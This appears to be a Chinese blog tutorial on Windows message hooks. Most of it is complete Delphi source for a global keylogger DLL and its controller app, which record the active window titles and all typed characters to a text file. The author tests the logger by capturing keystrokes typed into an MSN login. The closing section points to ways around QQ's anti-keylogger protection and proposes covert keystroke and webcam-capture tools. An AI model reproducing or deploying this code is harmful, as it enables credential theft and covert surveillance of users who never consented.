一.钩子的基本概念
a) Hook作用:监视windows消息,在“特定消息”没有到达窗口之前捕获它。
b)钩子分类:
线程专用钩子:只监视指定的线程
全局钩子:监视系统中的所有线程
如果Hook过程在应用程序中实现,若应用程序不是当前窗口时,该Hook就不起作用;
如果Hook在DLL中实现,程序在运行中动态调用它,它能实时对整个系统进行监控.
c)几种常用类型的钩子:
1)键盘钩子可以监视各种键盘消息。
2)鼠标钩子可以监视各种鼠标消息。
3)外壳钩子可以监视各种Shell事件消息,启动和关闭应用程序等。
4)日志钩子可以记录从系统消息队列中取出的各种事件消息。
5)窗口过程钩子监视所有从系统消息队列发往目标窗口的消息。
d) 详细参考:
理论分析:http://blog.csdn.net/yincheng01/article/details/6899305
常用方式:http://www.cnblogs.com/linyawen/archive/2011/03/25/1995624.html
二.键盘钩子的实际应用
a)键盘钩子DLL源码
library KeyboardHook; uses SysUtils, Windows, Messages, Classes; {$R *.res} var hook: HHOOK; {钩子变量} LastFocusWnd:Hwnd=0; PrvChar:Char; HookKey:String; KeyList:Tstringlist; const KeyMask=$80000000; {键盘钩子函数} function KeyboardHookProc(iCode: Integer; wParam: WPARAM; lParam:LPARAM):LRESULT;stdcall; var ch:Char; //记录一个个按下的按键字符 vKey:integer; //表示按下了哪个键 FocusWnd:HWND; //当前活动窗口句柄 Title:array[0..255] of char; //窗口句柄的标题 str:array[0..12] of char; // 当8<=vkey<=46时,表示按下的键名,例如[退格] PEvt:^EventMsg; //EventMsg的指针 iCapsLock,iNumLock,iShift:integer; //状态按键 bCapsLock,bNumLock,bShift:boolean; //是否按下状态按键 begin if iCode begin Result:=CallNextHookEx(hook,iCode,wParam,lParam); Exit; end; if (iCode = HC_ACTION) then //设备动作 begin PEvt := pointer(Dword(lparam)); //将lparam的指针传递给PEvt事件消息指针 FocusWnd:= GetActiveWindow; //获取活动窗体句柄 if (LastFocusWnd <> FocusWnd) then begin if (HookKey <> '') then begin KeyList.Add('键盘击打:'+HookKey); HookKey:= ''; end; GetWindowText(FocusWnd,Title,256); LastFocusWnd:= FocusWnd; KeyList.add(Format('激活窗口:%s',[Title])); end; if (PEvt.message = WM_KEYDOWN) then //如果事件消息为键下压操作 begin vkey := LoByte(PEvt.paramL ); //取得16进制数最低位那个字节的内容 iShift:= GetKeyState(VK_SHIFT); //获取这三个键的状态 iCapsLock:= GetKeyState(VK_CAPITAL); iNumLock:= GEtKeyState(VK_NUMLOCK); bShift:= ((iShift and KeyMask) = KeyMask); //判断它们的状态 bCapsLock:=(iCapsLock = 1); bNumLock:= (iNumLock = 1); end; if ((vKey >= 48) and (vKey <=57)) then // 0<=char(vkey)<=9 begin if (not bShift) then //如果没有按下Shift键 ch:= char (vkey) //数字字符 else begin case vkey of //否则为以下字符之一 48:ch:= ')'; 49:ch:= '!'; 50:ch:= '@'; 51:ch:= '#'; 52:ch:= '$'; 53:ch:= '%'; 54:ch:= '^'; 55:ch:= '&'; 56:ch:= '*'; 57:ch:= '('; end; //end case end; //end else HookKey:= HookKey + ch; end; //end if ((vKey >= 48) and (vKey <=57)) if ((vKey >=65) and (vKey <= 90)) then // 'A'<=char(vkey)<='Z' begin if (not bCapsLock) then //如果没有按下CapsLock键 begin if (bShift) then //按下了Shift键 ch:= char(vkey) //大写 else ch:= char(vkey + 32); //小写 end else //按下了CapsLock键 begin if (bShift) then //按下了Shift键 ch:= char(vkey + 32) //小写 else ch:= char(vkey); //大写 end; HookKey:= HookKey + ch; //将按键添加到按键字符串 end; if ((vkey >= 96) and (vkey <= 105)) then //小键盘的0-9 if bNumLock then HookKey:= HookKey + char(vkey - 96 + 48); ch:= 'n'; if ((vkey >= 105) and (vkey <=111)) then //+-*/ begin case vkey of 106:ch:= '*'; 107:ch:= '+'; 109:ch:= '-'; 111:ch:= '/'; else ch:= 'n'; end; end; if ((vkey >=186) and (vkey <= 222)) then //特殊符号 begin if (not bShift) then //没有按下Shift键 begin case vkey of 186:ch:= ';'; 187:ch:= '='; 189:ch:= ','; 190:ch:= '.'; 191:ch:= '/'; 192:ch:= '''' ; 219:ch:= '['; 220:ch:= '\'; 221:ch:= ']'; 222:ch:=char(27); else ch:= 'n'; end; //end case end else begin case vkey of 186:ch:= ':'; 187:ch:= '+'; 189:ch:= '<'; 190:ch:= '>'; 191:ch:= '?'; 192:ch:= '~'; 219:ch:= '{'; 220:ch:= '|'; 221:ch:= '}'; 222:ch:= '"'; else ch:= 'n'; end; //end case end; //end if else end; //end if ((vkey >=186) and (vkey <= 222)) if ch <> 'n' then //剔除未规定字符 HookKey := HookKey + ch; if ((vkey >= 8) and (vkey <=46)) then begin ch:= ' '; case vkey of 8:str:= '[BACK]'; 9:str:= '[TAB]'; 13:str:= '[ENTER]'; 32:str:= '[SPACE]'; 35:str:= '[END]'; 36:str:= '[HOME]'; 37:str:= '[LF]'; 38:str:= '[UF]'; 39:str:= '[RF]'; 40:str:= '[DF]'; 45:str:= '[INSERT]'; 46:str:= '[DELETE]'; else ch:= 'n'; end; if (ch <> 'n') then begin HookKey := HookKey + str; end; end; // KeyList.Add('ABC'); end;//end iCode= HC_ACTION result := CallNextHookEx(hook,iCode,wparam,lparam); end; {建立钩子} function SetHook:Boolean;stdcall; begin if (hook = 0) then begin KeyList:=Tstringlist.Create; hook := SetWindowsHookEx(WH_JOURNALRECORD,KeyboardHookProc,HInstance,0); //调用API HOOK Result:=hook<>0 end else Result:=False; end; {释放钩子} function DelHook:Boolean;stdcall; begin if (hook <> 0 ) then begin Result:=UnHookWindowsHookEx(hook); //卸载HOOK hook:=0; KeyList.Free; end else Result:=False; end; procedure PrintHook;stdcall; var printStr:string; txtFile:TextFile; fileName:string; begin if KeyList <> nil then begin printStr:=keyList.Text; KeyList.Text:=''; //将键盘输入内容进行打印 fileName:='E:\SourceCode\DelphiWorkspace\Demo\键盘Hook2\keyboardRecord.txt'; AssignFile(txtFile,fileName); if not FileExists(fileName) then begin Rewrite(txtFile); end else begin Append(txtFile); end; Writeln(txtFile,printStr); Closefile(txtFile); end; end; {按DLL的要求输出函数} exports SetHook name 'SetHook', DelHook name 'DelHook', PrintHook name 'PrintHook'; //SetHook,DelHook,PrintHook;{如果不需要改名,可以直接这样exports} begin end.
b)应用程序源码
unit Main; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls; type TFrmMain = class(TForm) Button1: TButton; Button2: TButton; Button3: TButton; Memo1: TMemo; procedure Button1Click(Sender: TObject); procedure Button2Click(Sender: TObject); procedure Button3Click(Sender: TObject); procedure FormCreate(Sender: TObject); procedure FormClose(Sender: TObject; var Action: TCloseAction); private { Private declarations } isHookInstalled:Boolean; public { Public declarations } end; {DLL 中的函数声明} function SetHook: Boolean; stdcall; function DelHook: Boolean; stdcall; procedure PrintHook;stdcall; var FrmMain: TFrmMain; implementation {$R *.dfm} {DLL 中的函数实现, 也就是说明来自那里, 原来叫什么名} function SetHook; external 'KeyboardHook.dll' name 'SetHook'; function DelHook; external 'KeyboardHook.dll' name 'DelHook'; procedure PrintHook; external 'KeyboardHook.dll' name 'PrintHook'; procedure TFrmMain.Button1Click(Sender: TObject); begin Self.Button1.Enabled:=False; Self.Button2.Enabled:=True; Self.Button3.Enabled:=True; if SetHook then begin isHookInstalled:=True; Self.Memo1.Lines.Add('键盘钩子已安装。。。'); end; end; procedure TFrmMain.Button2Click(Sender: TObject); begin PrintHook; Self.Memo1.Lines.Add('已打印'); end; procedure TFrmMain.Button3Click(Sender: TObject); begin if DelHook then begin isHookInstalled:=False; Self.Memo1.Lines.Add('键盘钩子已撤销!!!'); Self.Memo1.Lines.Add(' '); end; Self.Button1.Enabled:=True; Self.Button2.Enabled:=False; Self.Button3.Enabled:=False; end; procedure TFrmMain.FormCreate(Sender: TObject); begin Self.Button1.Enabled:=True; Self.Button2.Enabled:=False; Self.Button3.Enabled:=False; isHookInstalled:=False; Self.Memo1.Color:=clBlack; Self.Memo1.Font.Color:=clGreen; end; procedure TFrmMain.FormClose(Sender: TObject; var Action: TCloseAction); begin if isHookInstalled then DelHook; end; end.
c)运行结果
1)程序启动,安装键盘钩子
2)通过登录MSN进行测试
3)打印所有键盘操作至txt
三.其他
1.QQ登录窗口防键盘钩子的详细分析
http://wenku.baidu.com/view/05ecf86727d3240c8447ef9e.html
http://www.sadlycodes.com/?p=745
2.低级鼠标键盘钩子
WH_KEYBOARD_LL
WH_MOUSE_LL
http://hi.baidu.com/32881/blog/item/b410c702ec2e9c1c4afb5111.html
3.几个小工具
a)QQ启动后,记录下部分键盘操作
b)指定时间范围内个人电脑被恶意启动,记录下部分屏幕操作,并通过摄像头进行拍照